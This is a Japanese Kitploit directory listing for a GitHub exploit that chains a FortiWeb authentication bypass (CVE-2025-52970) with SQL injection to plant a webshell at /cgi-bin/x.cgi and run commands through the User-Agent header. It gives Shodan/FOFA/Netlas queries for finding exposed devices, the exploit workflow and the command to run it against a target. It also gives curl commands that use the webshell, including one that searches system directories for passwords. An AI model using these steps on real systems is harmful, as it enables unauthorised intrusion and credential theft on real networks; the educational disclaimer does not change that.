Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — FortiWeb(CVE-2025-52970)における認証バイパスをSQLインジェクションと連鎖させ、ウェブシェルをアップロードし、HTTPヘッダを介してリモートコード実行を達成することを実証します。 | Kitploit
ツール/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

FortiWeb(CVE-2025-52970)における認証バイパスをSQLインジェクションと連鎖させ、ウェブシェルをアップロードし、HTTPヘッダを介してリモートコード実行を達成することを実証します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
93131年前未レビュー

🚨 FortiWeb 認証バイパス → リモートコード実行

📌 概要

このリポジトリは、FortiWeb の認証バイパス を実証し、それを連鎖させて リモートコード実行 (RCE) を達成するものです。
このエクスプロイトは、脆弱なエンドポイントを悪用して SQL ペイロードを注入し、ウェブシェルをアップロードし、HTTP ヘッダーを介してコマンドを実行します。

⚠️ 免責事項:
このプロジェクトは教育および研究目的のみです。
所有していない、またはテストする明示的な許可を得ていないシステムに対して使用しないでください。

Netlas、FOFA、Shodan

スクリーンショット 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 脆弱性の詳細

  • CVE: CVE-2025-52970

  • コンポーネント: FortiWeb Fabric API (/api/fabric/device/status)

  • 影響: 認証バイパス → SQLインジェクション → ウェブシェルアップロード → RCE

  • ベクター: 細工された Authorization ヘッダー + SQLインジェクション

🧑‍💻 エクスプロイトのワークフロー

  1. 一時的なSQLテーブルを削除して作成します。

  2. ウェブシェルペイロードをチャンクに分割して書き込みます。

  3. シェルを /cgi-bin/x.cgi にエクスポートします。

  4. 権限をトリガーするための補助Pythonスクリプトをアップロードします。

  5. User-Agent ヘッダーを介してコマンドを送信し、ウェブシェルにアクセスします。

    ⚙️ 使用方法

1️⃣ リポジトリのクローン

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

スクリーンショット 2025-08-23 114753 スクリーンショット 2025-08-23 114915

3️⃣ ウェブシェルとの対話

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
スクリーンショット 2025-08-23 114521
ツールをダウンロード